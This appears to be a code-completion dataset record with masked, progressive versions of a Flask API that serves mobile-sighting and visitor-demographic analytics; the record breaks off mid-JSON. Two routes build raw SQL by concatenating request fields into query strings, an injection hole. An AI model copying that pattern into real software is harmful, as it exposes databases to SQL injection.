@app.route('/api/ng_event/profiles', methods=['GET'])
def profiles():
results = []
for result in db.session.query(Profile.country, Profile.nationality, Profile.name_province, Profile.gender, Profile.age, Profile.rent, Profile.type_visitor, Profile.date, Profile.day, Profile.period, Profile.name_tur_zone).limit(10000):
district = ''
if result.name_tur_zone == 'Zone 1' : district = 'Chamartin'
if result.name_tur_zone == 'Zone 2' : district = 'Chamberi'
if result.name_tur_zone == 'Zone 3' : district = 'Salamanca'
day = ''
if result.day == 'Monday' : day = 'Mon'
if result.day == 'Tuesday' : day = 'Tue'
if result.day == 'Wednesday' : day = 'Wed'
if result.day == 'Thursday' : day = 'Thu'
if result.day == 'Friday' : day = 'Fri'
if result.day == 'Saturday' : day = 'Sat'
if result.day == 'Sunday' : day = 'Sun'
results.append({'country' : result.country, 'nationality' : result.nationality, 'name_province' : district, 'gender' : result.gender, 'age' : result.age, 'rent' : result.rent, 'type_visitor' : result.type_visitor, 'date' : result.date, 'day' : day, 'period' : result.period, 'zone' : result.name_tur_zone })
return make_response(jsonify(results)), 200
@app.route('/api/ng_event/dowfreq', methods=['GET'])
def dowfreq():
results = []
for result in db.session.query(DOWFrequency.type_visitor, DOWFrequency.start_dow, DOWFrequency.start_hour, DOWFrequency.count).all():
results.append({'type_visitor' : result.type_visitor, 'start_dow' : result.start_dow, 'start_hour' : result.start_hour, 'count' : result.count })
return make_response(jsonify(results)), 200
return app
|
normal
|
{
"blob_id": "2f76bcfde11597f87bb9e058f7617e95c78ed383",
"index": 7950,
"step-1": "<mask token>\n\n\nclass Department(SQLAlchemyObjectType):\n\n\n class Meta:\n model = DepartmentModel\n interfaces = relay.Node,\n\n\nclass Query(graphene.ObjectType):\n node = relay.Node.Field()\n all_employees = SQLAlchemyConnectionField(Department)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Department(SQLAlchemyObjectType):\n\n\n class Meta:\n model = DepartmentModel\n interfaces = relay.Node,\n\n\nclass Query(graphene.ObjectType):\n node = relay.Node.Field()\n all_employees = SQLAlchemyConnectionField(Department)\n\n\ndef create_app(config_name):\n app = FlaskAPI(__name__, instance_relative_config=True)\n bcrypt = Bcrypt(app)\n schema = graphene.Schema(query=Query)\n app.add_url_rule('/graphql', view_func=GraphQLView.as_view('graphql',\n schema=schema, graphiql=True))\n app.config.from_object(app_config[config_name])\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n db.init_app(app)\n\n @app.route('/api/areas/create', methods=['POST'])\n def create_areas():\n name = request.data.get('name', '')\n geodata = request.data.get('geodata', '')\n center_lat = request.data.get('center_lat')\n center_lng = request.data.get('center_lng')\n zoom = request.data.get('zoom')\n area = Area(name=name, geodata=geodata, center_lat=center_lat,\n center_lng=center_lng, zoom=zoom)\n area.save()\n response = jsonify({'id': area.id, 'name': area.name, 'geodata':\n area.geodata, 'center_lat': area.center_lat, 'center_lng': area\n .center_lng, 'zoom': area.zoom, 'date_created': area.\n date_created, 'date_modified': area.date_modified})\n return make_response(response), 201\n\n @app.route('/api/areas/delete', methods=['POST'])\n def delete_areas():\n id = request.data.get('id', 0)\n area = Area.query.filter_by(id=id).first()\n if area is not None:\n area.delete()\n return make_response(jsonify({'id': id})), 200\n\n @app.route('/api/sightingsperhour', methods=['GET'])\n def get_sightingsperhour():\n sightings = SightingsPerHourPerCountry.query.all()\n results = []\n for sighting in sightings:\n results.append({'country': sighting.country, 'hour': sighting.\n hour, 'count': sighting.count})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sightingsnew', methods=['POST'])\n def sightingsnew():\n sightings = db.session.query(SightingsBase.site_id, SightingsBase.\n country, func.count(SightingsBase.roundedtoday)).filter(\n SightingsBase.site_id.in_(request.data['selectedRow'])).filter(\n SightingsBase.roundedtoday.between(request.data['selectedDates'\n ][0], request.data['selectedDates'][1])).group_by(SightingsBase\n .site_id, SightingsBase.country).order_by(SightingsBase.site_id,\n func.count(SightingsBase.roundedtoday).desc())\n results = []\n for sighting in sightings.all():\n results.append({'country': sighting.country, 'site_id':\n sighting.site_id, 'count': sighting[2]})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/widesightingsnew', methods=['POST', 'GET'])\n def widesightingsnew():\n sightings = db.session.query(WideSighting.site_id, WideSighting.\n gender, func.count(WideSighting.gender)).filter(WideSighting.\n site_id.in_([138, 134])).group_by(WideSighting.site_id,\n WideSighting.gender)\n results = []\n for sighting in sightings.all():\n results.append({'site_id': sighting.site_id, 'gender': sighting\n .gender, 'count': sighting[2]})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/widesightings', methods=['GET'])\n def widesightings():\n sightings = WideSighting.get_all()\n results = []\n for sighting in sightings:\n results.append(sighting.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sites', methods=['GET'])\n def get_sites():\n sites = Site.get_all()\n results = []\n for site in sites:\n results.append(site.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/dates', methods=['GET'])\n def get_dates():\n dates = Date.get_all()\n results = []\n for date in dates:\n results.append(date.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/areas', methods=['GET'])\n def get_areas():\n areas = Area.get_all()\n allSmallCells = SmallCell.get_all()\n results = []\n for area in areas:\n smallcellInArea = []\n for smallcell in allSmallCells:\n smallcellInArea.append(smallcell.serialise())\n obj = {'id': area.id, 'name': area.name, 'date_created': area.\n date_created, 'date_modified': area.date_modified,\n 'center_lat': area.center_lat, 'center_lng': area.\n center_lng, 'zoom': area.zoom, 'geodata': area.geodata,\n 'smallcells': smallcellInArea}\n results.append(obj)\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/smallcells', methods=['GET'])\n def get_smallcells():\n allSmallCells = SmallCell.query.order_by(SmallCell.id).all()\n results = []\n for smallcell in allSmallCells:\n results.append(smallcell.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/smallcells/update', methods=['POST'])\n def update_smallcell():\n smallcell_id = request.data.get('id', '')\n site_id = request.data.get('site_id', '')\n smallcell = SmallCell.query.filter_by(id=smallcell_id).first()\n smallcell.site_id = site_id\n smallcell.save()\n return make_response(jsonify({'smallcell_id': smallcell.id,\n 'site_id': smallcell.site_id})), 200\n\n @app.route('/api/sighting/byarea/<areaid>', methods=['GET'])\n def get_sighting(areaid):\n import string\n area = Area.query.filter_by(id=areaid).first()\n if area is None:\n return make_response(jsonify({'list': []})), 200\n sites = []\n for site in Site.get_all():\n if area.contains(site):\n sites.append(str(site.id))\n\n def generate_random_data(num_rows):\n import random\n latitude = 51.51451110408478\n longitude = -0.12620388576521444\n result = []\n for _ in range(num_rows):\n dec_lat = random.random() / 10\n dec_lon = random.random() / 10\n result.append({'lat': latitude + dec_lat, 'lng': longitude +\n dec_lon})\n return result\n results = []\n if len(sites) > 0:\n for row in db.session.execute(\n 'select * from get_gender_crossfilter(ARRAY[' + ','.join(\n sites) + '])'):\n results.append({'geos': generate_random_data(5), 'gender':\n row['__gender'], 'age_range': row['__age_range'],\n 'timestamp': row['__sighting_date'], 'count': row[\n '__count']})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sighting/getgender/', methods=['POST'])\n def get_gender():\n site_ids = str(request.data.get('site_ids', ''))\n from_sighting_date = request.data.get('selectedDates')[0]\n to_sighting_date = request.data.get('selectedDates')[1]\n import string\n results = []\n for row in db.session.execute('select * from get_gender(ARRAY[' +\n site_ids + '],' + \"'\" + from_sighting_date + \"'\" + ',' + \"'\" +\n to_sighting_date + \"'\" + ')'):\n results.append({'site_id': row['__site_id'], 'date_month': row[\n '__date_month'], 'gender': row['__gender'], 'age_range':\n row['__age_range'], 'perc_visits': row['__perc_visits'],\n 'scaled_visits': row['__scaled_visits']})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sighting/getgendertotals/', methods=['POST'])\n def get_gender_age_totals():\n site_ids = str(request.data.get('site_ids', ''))\n from_sighting_date = request.data.get('selectedDates')[0]\n to_sighting_date = request.data.get('selectedDates')[1]\n import string\n results = []\n for row in db.session.execute(\n 'select * from get_gender_age_totals(ARRAY[' + site_ids + '],' +\n \"'\" + from_sighting_date + \"'\" + ',' + \"'\" + to_sighting_date +\n \"'\" + ')'):\n results.append({'site_id': row['__site_id'], 'gender': row[\n '__gender'], 'age_range': row['__age_range'], '__visits':\n row['__visits']})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sighting', methods=['GET'])\n def get_sightings():\n results = []\n for sighting in LTESighting.get_all():\n results.append(sighting.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sitescomparison', methods=['POST'])\n def get_sitescomparison():\n sightings = LTESighting.query.filter(LTESighting.smallcell.has(\n SmallCell.site_id.in_(request.data['selectedRow']))).filter(\n LTESighting.timestamp.between(request.data['selectedDates'][0],\n request.data['selectedDates'][1]))\n return make_response(jsonify({'list': [sighting.serialise() for\n sighting in sightings]})), 200\n\n @app.route('/api/sighting/bysite', methods=['GET'])\n def get_sightings_by_site():\n site_ids = request.args.getlist('site_id')\n results = []\n for sighting in LTESighting.query:\n if str(sighting.smallcell.site_id) in site_ids:\n results.append(sighting.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/origindestination/all', methods=['GET'])\n def get_all():\n journeys = Journey.query.all()\n thing = {}\n for journey in journeys:\n if journey.origin_id not in thing:\n thing[journey.origin_id] = {}\n if journey.destination_id not in thing[journey.origin_id\n ] and journey.destination_id != journey.origin_id:\n thing[journey.origin_id][journey.destination_id\n ] = journey.data['total']\n return make_response(jsonify(thing)), 200\n\n @app.route('/api/origindestination/<origin_id>', methods=['GET'])\n def get_od(origin_id):\n journeys = Journey.query.all()\n _j = []\n for journey in journeys:\n _j.append({'origin_id': journey.origin_id, 'destination_id':\n journey.destination_id, 'total': journey.data['total']})\n return make_response(jsonify({'list': _j})), 200\n\n @app.route('/api/ng_event/purchase/<home_district_name>/<type_visitor>',\n methods=['GET'])\n def purchase(home_district_name, type_visitor):\n days_sql = db.session.query(PurchDistrict.start_dow, func.count(\n PurchDistrict.start_dow)).group_by(PurchDistrict.start_dow).filter(\n PurchDistrict.home_district_name.in_([home_district_name])).filter(\n PurchDistrict.type_visitor.in_([type_visitor])).order_by(func.\n count(PurchDistrict.start_dow).desc()).all()\n gender_sql = db.session.query(PurchDistrict.gender, func.count(\n PurchDistrict.gender)).group_by(PurchDistrict.gender).filter(\n PurchDistrict.home_district_name.in_([home_district_name])).filter(\n PurchDistrict.type_visitor.in_([type_visitor])).all()\n gender_age_sql = db.session.query(PurchDistrict.gender,\n PurchDistrict.age, func.count(PurchDistrict.gender)).group_by(\n PurchDistrict.gender, PurchDistrict.age).filter(PurchDistrict.\n gender.isnot(None)).filter(PurchDistrict.age.isnot(None)).filter(\n PurchDistrict.home_district_name.in_([home_district_name])).filter(\n PurchDistrict.type_visitor.in_([type_visitor])).all()\n gender_age_rent_sql = db.session.query(PurchDistrict.gender,\n PurchDistrict.age, PurchDistrict.rent, func.count(PurchDistrict\n .gender)).group_by(PurchDistrict.gender, PurchDistrict.age,\n PurchDistrict.rent).filter(PurchDistrict.gender.isnot(None)\n ).filter(PurchDistrict.age.isnot(None)).filter(PurchDistrict.\n type_visitor.in_([type_visitor])).all()\n days_total = sum(i[1] for i in days_sql)\n gender_total = sum(i[1] for i in gender_sql)\n gender_age_total = sum(i[2] for i in gender_age_sql)\n days_results = []\n for result in days_sql:\n days_results.append({'start_dow': result.start_dow, 'count':\n result[1], 'percent': float(result[1]) / float(days_total),\n 'total': days_total})\n gender_results = []\n for result in gender_sql:\n gender_results.append({'gender': result.gender, 'count': result\n [1], 'percent': float(result[1]) / float(gender_total)})\n gender_age_results = []\n for result in gender_age_sql:\n gender_age_results.append({'gender': result.gender, 'age':\n result.age, 'count': result[2], 'percent': float(result[2]) /\n float(gender_age_total)})\n return make_response(jsonify({'days': days_results, 'gender':\n gender_results, 'gender_age': gender_age_results})), 200\n\n @app.route('/api/ng_event/purchase_affluence/<type_visitor>', methods=[\n 'GET'])\n def purchase_rent(type_visitor):\n gender_sql = db.session.query(PurchDistrict.gender, func.count(\n PurchDistrict.gender)).group_by(PurchDistrict.gender).filter(\n PurchDistrict.type_visitor.in_([type_visitor])).all()\n gender_age_rent_sql = db.session.query(PurchDistrict.gender,\n PurchDistrict.age, PurchDistrict.rent, func.count(PurchDistrict\n .gender)).group_by(PurchDistrict.gender, PurchDistrict.age,\n PurchDistrict.rent).filter(PurchDistrict.gender.isnot(None)\n ).filter(PurchDistrict.age.isnot(None)).filter(PurchDistrict.\n type_visitor.in_([type_visitor])).all()\n gender_total = sum(i[1] for i in gender_sql)\n gender_results = []\n for result in gender_sql:\n gender_results.append({'gender': result.gender, 'count': result\n [1], 'percent': float(result[1]) / float(gender_total)})\n gender_age_rent_results = []\n for result in gender_age_rent_sql:\n gender_age_rent_results.append({'gender': result.gender, 'age':\n result.age, 'rent': result.rent, 'count': result[3]})\n return make_response(jsonify({'gender': gender_results,\n 'gender_age_rent': gender_age_rent_results})), 200\n\n @app.route('/api/ng_event/districts', methods=['GET'])\n def districts():\n home_results = []\n for result in db.session.query(ZoneDistrict.home_district_code,\n ZoneDistrict.home_district_name, func.sum(ZoneDistrict.visitors)\n ).group_by(ZoneDistrict.home_district_code, ZoneDistrict.\n home_district_name).all():\n home_results.append({'district_code': result.home_district_code,\n 'district_name': result.home_district_name, 'visitors':\n result[2]})\n work_results = []\n for result in db.session.query(ZoneDistrict.work_district_code,\n ZoneDistrict.work_district_name, func.sum(ZoneDistrict.visitors)\n ).group_by(ZoneDistrict.work_district_code, ZoneDistrict.\n work_district_name).all():\n work_results.append({'district_code': result.work_district_code,\n 'district_name': result.work_district_name, 'visitors':\n result[2]})\n return make_response(jsonify({'work': {'list': work_results},\n 'home': {'list': home_results}})), 200\n\n @app.route('/api/ng_event/attractiontotals', methods=['GET'])\n def attractiontotals():\n results = []\n for result in db.session.query(AttractionTotal.zone_visitors,\n AttractionTotal.num_visitors).all():\n results.append({'zone_visitors': result.zone_visitors,\n 'num_visitors': result.num_visitors})\n return make_response(jsonify({'totals': {'list': results}})), 200\n\n @app.route('/api/ng_event/profiles', methods=['GET'])\n def profiles():\n results = []\n for result in db.session.query(Profile.country, Profile.nationality,\n Profile.name_province, Profile.gender, Profile.age, Profile.\n rent, Profile.type_visitor, Profile.date, Profile.day, Profile.\n period, Profile.name_tur_zone).limit(10000):\n district = ''\n if result.name_tur_zone == 'Zone 1':\n district = 'Chamartin'\n if result.name_tur_zone == 'Zone 2':\n district = 'Chamberi'\n if result.name_tur_zone == 'Zone 3':\n district = 'Salamanca'\n day = ''\n if result.day == 'Monday':\n day = 'Mon'\n if result.day == 'Tuesday':\n day = 'Tue'\n if result.day == 'Wednesday':\n day = 'Wed'\n if result.day == 'Thursday':\n day = 'Thu'\n if result.day == 'Friday':\n day = 'Fri'\n if result.day == 'Saturday':\n day = 'Sat'\n if result.day == 'Sunday':\n day = 'Sun'\n results.append({'country': result.country, 'nationality':\n result.nationality, 'name_province': district, 'gender':\n result.gender, 'age': result.age, 'rent': result.rent,\n 'type_visitor': result.type_visitor, 'date': result.date,\n 'day': day, 'period': result.period, 'zone': result.\n name_tur_zone})\n return make_response(jsonify(results)), 200\n\n @app.route('/api/ng_event/dowfreq', methods=['GET'])\n def dowfreq():\n results = []\n for result in db.session.query(DOWFrequency.type_visitor,\n DOWFrequency.start_dow, DOWFrequency.start_hour, DOWFrequency.count\n ).all():\n results.append({'type_visitor': result.type_visitor,\n 'start_dow': result.start_dow, 'start_hour': result.\n start_hour, 'count': result.count})\n return make_response(jsonify(results)), 200\n return app\n",
"step-3": "<mask token>\ndb = SQLAlchemy()\n<mask token>\n\n\nclass Department(SQLAlchemyObjectType):\n\n\n class Meta:\n model = DepartmentModel\n interfaces = relay.Node,\n\n\nclass Query(graphene.ObjectType):\n node = relay.Node.Field()\n all_employees = SQLAlchemyConnectionField(Department)\n\n\ndef create_app(config_name):\n app = FlaskAPI(__name__, instance_relative_config=True)\n bcrypt = Bcrypt(app)\n schema = graphene.Schema(query=Query)\n app.add_url_rule('/graphql', view_func=GraphQLView.as_view('graphql',\n schema=schema, graphiql=True))\n app.config.from_object(app_config[config_name])\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n db.init_app(app)\n\n @app.route('/api/areas/create', methods=['POST'])\n def create_areas():\n name = request.data.get('name', '')\n geodata = request.data.get('geodata', '')\n center_lat = request.data.get('center_lat')\n center_lng = request.data.get('center_lng')\n zoom = request.data.get('zoom')\n area = Area(name=name, geodata=geodata, center_lat=center_lat,\n center_lng=center_lng, zoom=zoom)\n area.save()\n response = jsonify({'id': area.id, 'name': area.name, 'geodata':\n area.geodata, 'center_lat': area.center_lat, 'center_lng': area\n .center_lng, 'zoom': area.zoom, 'date_created': area.\n date_created, 'date_modified': area.date_modified})\n return make_response(response), 201\n\n @app.route('/api/areas/delete', methods=['POST'])\n def delete_areas():\n id = request.data.get('id', 0)\n area = Area.query.filter_by(id=id).first()\n if area is not None:\n area.delete()\n return make_response(jsonify({'id': id})), 200\n\n @app.route('/api/sightingsperhour', methods=['GET'])\n def get_sightingsperhour():\n sightings = SightingsPerHourPerCountry.query.all()\n results = []\n for sighting in sightings:\n results.append({'country': sighting.country, 'hour': sighting.\n hour, 'count': sighting.count})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sightingsnew', methods=['POST'])\n def sightingsnew():\n sightings = db.session.query(SightingsBase.site_id, SightingsBase.\n country, func.count(SightingsBase.roundedtoday)).filter(\n SightingsBase.site_id.in_(request.data['selectedRow'])).filter(\n SightingsBase.roundedtoday.between(request.data['selectedDates'\n ][0], request.data['selectedDates'][1])).group_by(SightingsBase\n .site_id, SightingsBase.country).order_by(SightingsBase.site_id,\n func.count(SightingsBase.roundedtoday).desc())\n results = []\n for sighting in sightings.all():\n results.append({'country': sighting.country, 'site_id':\n sighting.site_id, 'count': sighting[2]})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/widesightingsnew', methods=['POST', 'GET'])\n def widesightingsnew():\n sightings = db.session.query(WideSighting.site_id, WideSighting.\n gender, func.count(WideSighting.gender)).filter(WideSighting.\n site_id.in_([138, 134])).group_by(WideSighting.site_id,\n WideSighting.gender)\n results = []\n for sighting in sightings.all():\n results.append({'site_id': sighting.site_id, 'gender': sighting\n .gender, 'count': sighting[2]})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/widesightings', methods=['GET'])\n def widesightings():\n sightings = WideSighting.get_all()\n results = []\n for sighting in sightings:\n results.append(sighting.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sites', methods=['GET'])\n def get_sites():\n sites = Site.get_all()\n results = []\n for site in sites:\n results.append(site.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/dates', methods=['GET'])\n def get_dates():\n dates = Date.get_all()\n results = []\n for date in dates:\n results.append(date.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/areas', methods=['GET'])\n def get_areas():\n areas = Area.get_all()\n allSmallCells = SmallCell.get_all()\n results = []\n for area in areas:\n smallcellInArea = []\n for smallcell in allSmallCells:\n smallcellInArea.append(smallcell.serialise())\n obj = {'id': area.id, 'name': area.name, 'date_created': area.\n date_created, 'date_modified': area.date_modified,\n 'center_lat': area.center_lat, 'center_lng': area.\n center_lng, 'zoom': area.zoom, 'geodata': area.geodata,\n 'smallcells': smallcellInArea}\n results.append(obj)\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/smallcells', methods=['GET'])\n def get_smallcells():\n allSmallCells = SmallCell.query.order_by(SmallCell.id).all()\n results = []\n for smallcell in allSmallCells:\n results.append(smallcell.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/smallcells/update', methods=['POST'])\n def update_smallcell():\n smallcell_id = request.data.get('id', '')\n site_id = request.data.get('site_id', '')\n smallcell = SmallCell.query.filter_by(id=smallcell_id).first()\n smallcell.site_id = site_id\n smallcell.save()\n return make_response(jsonify({'smallcell_id': smallcell.id,\n 'site_id': smallcell.site_id})), 200\n\n @app.route('/api/sighting/byarea/<areaid>', methods=['GET'])\n def get_sighting(areaid):\n import string\n area = Area.query.filter_by(id=areaid).first()\n if area is None:\n return make_response(jsonify({'list': []})), 200\n sites = []\n for site in Site.get_all():\n if area.contains(site):\n sites.append(str(site.id))\n\n def generate_random_data(num_rows):\n import random\n latitude = 51.51451110408478\n longitude = -0.12620388576521444\n result = []\n for _ in range(num_rows):\n dec_lat = random.random() / 10\n dec_lon = random.random() / 10\n result.append({'lat': latitude + dec_lat, 'lng': longitude +\n dec_lon})\n return result\n results = []\n if len(sites) > 0:\n for row in db.session.execute(\n 'select * from get_gender_crossfilter(ARRAY[' + ','.join(\n sites) + '])'):\n results.append({'geos': generate_random_data(5), 'gender':\n row['__gender'], 'age_range': row['__age_range'],\n 'timestamp': row['__sighting_date'], 'count': row[\n '__count']})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sighting/getgender/', methods=['POST'])\n def get_gender():\n site_ids = str(request.data.get('site_ids', ''))\n from_sighting_date = request.data.get('selectedDates')[0]\n to_sighting_date = request.data.get('selectedDates')[1]\n import string\n results = []\n for row in db.session.execute('select * from get_gender(ARRAY[' +\n site_ids + '],' + \"'\" + from_sighting_date + \"'\" + ',' + \"'\" +\n to_sighting_date + \"'\" + ')'):\n results.append({'site_id': row['__site_id'], 'date_month': row[\n '__date_month'], 'gender': row['__gender'], 'age_range':\n row['__age_range'], 'perc_visits': row['__perc_visits'],\n 'scaled_visits': row['__scaled_visits']})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sighting/getgendertotals/', methods=['POST'])\n def get_gender_age_totals():\n site_ids = str(request.data.get('site_ids', ''))\n from_sighting_date = request.data.get('selectedDates')[0]\n to_sighting_date = request.data.get('selectedDates')[1]\n import string\n results = []\n for row in db.session.execute(\n 'select * from get_gender_age_totals(ARRAY[' + site_ids + '],' +\n \"'\" + from_sighting_date + \"'\" + ',' + \"'\" + to_sighting_date +\n \"'\" + ')'):\n results.append({'site_id': row['__site_id'], 'gender': row[\n '__gender'], 'age_range': row['__age_range'], '__visits':\n row['__visits']})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sighting', methods=['GET'])\n def get_sightings():\n results = []\n for sighting in LTESighting.get_all():\n results.append(sighting.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sitescomparison', methods=['POST'])\n def get_sitescomparison():\n sightings = LTESighting.query.filter(LTESighting.smallcell.has(\n SmallCell.site_id.in_(request.data['selectedRow']))).filter(\n LTESighting.timestamp.between(request.data['selectedDates'][0],\n request.data['selectedDates'][1]))\n return make_response(jsonify({'list': [sighting.serialise() for\n sighting in sightings]})), 200\n\n @app.route('/api/sighting/bysite', methods=['GET'])\n def get_sightings_by_site():\n site_ids = request.args.getlist('site_id')\n results = []\n for sighting in LTESighting.query:\n if str(sighting.smallcell.site_id) in site_ids:\n results.append(sighting.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/origindestination/all', methods=['GET'])\n def get_all():\n journeys = Journey.query.all()\n thing = {}\n for journey in journeys:\n if journey.origin_id not in thing:\n thing[journey.origin_id] = {}\n if journey.destination_id not in thing[journey.origin_id\n ] and journey.destination_id != journey.origin_id:\n thing[journey.origin_id][journey.destination_id\n ] = journey.data['total']\n return make_response(jsonify(thing)), 200\n\n @app.route('/api/origindestination/<origin_id>', methods=['GET'])\n def get_od(origin_id):\n journeys = Journey.query.all()\n _j = []\n for journey in journeys:\n _j.append({'origin_id': journey.origin_id, 'destination_id':\n journey.destination_id, 'total': journey.data['total']})\n return make_response(jsonify({'list': _j})), 200\n\n @app.route('/api/ng_event/purchase/<home_district_name>/<type_visitor>',\n methods=['GET'])\n def purchase(home_district_name, type_visitor):\n days_sql = db.session.query(PurchDistrict.start_dow, func.count(\n PurchDistrict.start_dow)).group_by(PurchDistrict.start_dow).filter(\n PurchDistrict.home_district_name.in_([home_district_name])).filter(\n PurchDistrict.type_visitor.in_([type_visitor])).order_by(func.\n count(PurchDistrict.start_dow).desc()).all()\n gender_sql = db.session.query(PurchDistrict.gender, func.count(\n PurchDistrict.gender)).group_by(PurchDistrict.gender).filter(\n PurchDistrict.home_district_name.in_([home_district_name])).filter(\n PurchDistrict.type_visitor.in_([type_visitor])).all()\n gender_age_sql = db.session.query(PurchDistrict.gender,\n PurchDistrict.age, func.count(PurchDistrict.gender)).group_by(\n PurchDistrict.gender, PurchDistrict.age).filter(PurchDistrict.\n gender.isnot(None)).filter(PurchDistrict.age.isnot(None)).filter(\n PurchDistrict.home_district_name.in_([home_district_name])).filter(\n PurchDistrict.type_visitor.in_([type_visitor])).all()\n gender_age_rent_sql = db.session.query(PurchDistrict.gender,\n PurchDistrict.age, PurchDistrict.rent, func.count(PurchDistrict\n .gender)).group_by(PurchDistrict.gender, PurchDistrict.age,\n PurchDistrict.rent).filter(PurchDistrict.gender.isnot(None)\n ).filter(PurchDistrict.age.isnot(None)).filter(PurchDistrict.\n type_visitor.in_([type_visitor])).all()\n days_total = sum(i[1] for i in days_sql)\n gender_total = sum(i[1] for i in gender_sql)\n gender_age_total = sum(i[2] for i in gender_age_sql)\n days_results = []\n for result in days_sql:\n days_results.append({'start_dow': result.start_dow, 'count':\n result[1], 'percent': float(result[1]) / float(days_total),\n 'total': days_total})\n gender_results = []\n for result in gender_sql:\n gender_results.append({'gender': result.gender, 'count': result\n [1], 'percent': float(result[1]) / float(gender_total)})\n gender_age_results = []\n for result in gender_age_sql:\n gender_age_results.append({'gender': result.gender, 'age':\n result.age, 'count': result[2], 'percent': float(result[2]) /\n float(gender_age_total)})\n return make_response(jsonify({'days': days_results, 'gender':\n gender_results, 'gender_age': gender_age_results})), 200\n\n @app.route('/api/ng_event/purchase_affluence/<type_visitor>', methods=[\n 'GET'])\n def purchase_rent(type_visitor):\n gender_sql = db.session.query(PurchDistrict.gender, func.count(\n PurchDistrict.gender)).group_by(PurchDistrict.gender).filter(\n PurchDistrict.type_visitor.in_([type_visitor])).all()\n gender_age_rent_sql = db.session.query(PurchDistrict.gender,\n PurchDistrict.age, PurchDistrict.rent, func.count(PurchDistrict\n .gender)).group_by(PurchDistrict.gender, PurchDistrict.age,\n PurchDistrict.rent).filter(PurchDistrict.gender.isnot(None)\n ).filter(PurchDistrict.age.isnot(None)).filter(PurchDistrict.\n type_visitor.in_([type_visitor])).all()\n gender_total = sum(i[1] for i in gender_sql)\n gender_results = []\n for result in gender_sql:\n gender_results.append({'gender': result.gender, 'count': result\n [1], 'percent': float(result[1]) / float(gender_total)})\n gender_age_rent_results = []\n for result in gender_age_rent_sql:\n gender_age_rent_results.append({'gender': result.gender, 'age':\n result.age, 'rent': result.rent, 'count': result[3]})\n return make_response(jsonify({'gender': gender_results,\n 'gender_age_rent': gender_age_rent_results})), 200\n\n @app.route('/api/ng_event/districts', methods=['GET'])\n def districts():\n home_results = []\n for result in db.session.query(ZoneDistrict.home_district_code,\n ZoneDistrict.home_district_name, func.sum(ZoneDistrict.visitors)\n ).group_by(ZoneDistrict.home_district_code, ZoneDistrict.\n home_district_name).all():\n home_results.append({'district_code': result.home_district_code,\n 'district_name': result.home_district_name, 'visitors':\n result[2]})\n work_results = []\n for result in db.session.query(ZoneDistrict.work_district_code,\n ZoneDistrict.work_district_name, func.sum(ZoneDistrict.visitors)\n ).group_by(ZoneDistrict.work_district_code, ZoneDistrict.\n work_district_name).all():\n work_results.append({'district_code': result.work_district_code,\n 'district_name': result.work_district_name, 'visitors':\n result[2]})\n return make_response(jsonify({'work': {'list': work_results},\n 'home': {'list': home_results}})), 200\n\n @app.route('/api/ng_event/attractiontotals', methods=['GET'])\n def attractiontotals():\n results = []\n for result in db.session.query(AttractionTotal.zone_visitors,\n AttractionTotal.num_visitors).all():\n results.append({'zone_visitors': result.zone_visitors,\n 'num_visitors': result.num_visitors})\n return make_response(jsonify({'totals': {'list': results}})), 200\n\n @app.route('/api/ng_event/profiles', methods=['GET'])\n def profiles():\n results = []\n for result in db.session.query(Profile.country, Profile.nationality,\n Profile.name_province, Profile.gender, Profile.age, Profile.\n rent, Profile.type_visitor, Profile.date, Profile.day, Profile.\n period, Profile.name_tur_zone).limit(10000):\n district = ''\n if result.name_tur_zone == 'Zone 1':\n district = 'Chamartin'\n if result.name_tur_zone == 'Zone 2':\n district = 'Chamberi'\n if result.name_tur_zone == 'Zone 3':\n district = 'Salamanca'\n day = ''\n if result.day == 'Monday':\n day = 'Mon'\n if result.day == 'Tuesday':\n day = 'Tue'\n if result.day == 'Wednesday':\n day = 'Wed'\n if result.day == 'Thursday':\n day = 'Thu'\n if result.day == 'Friday':\n day = 'Fri'\n if result.day == 'Saturday':\n day = 'Sat'\n if result.day == 'Sunday':\n day = 'Sun'\n results.append({'country': result.country, 'nationality':\n result.nationality, 'name_province': district, 'gender':\n result.gender, 'age': result.age, 'rent': result.rent,\n 'type_visitor': result.type_visitor, 'date': result.date,\n 'day': day, 'period': result.period, 'zone': result.\n name_tur_zone})\n return make_response(jsonify(results)), 200\n\n @app.route('/api/ng_event/dowfreq', methods=['GET'])\n def dowfreq():\n results = []\n for result in db.session.query(DOWFrequency.type_visitor,\n DOWFrequency.start_dow, DOWFrequency.start_hour, DOWFrequency.count\n ).all():\n results.append({'type_visitor': result.type_visitor,\n 'start_dow': result.start_dow, 'start_hour': result.\n start_hour, 'count': result.count})\n return make_response(jsonify(results)), 200\n return app\n",
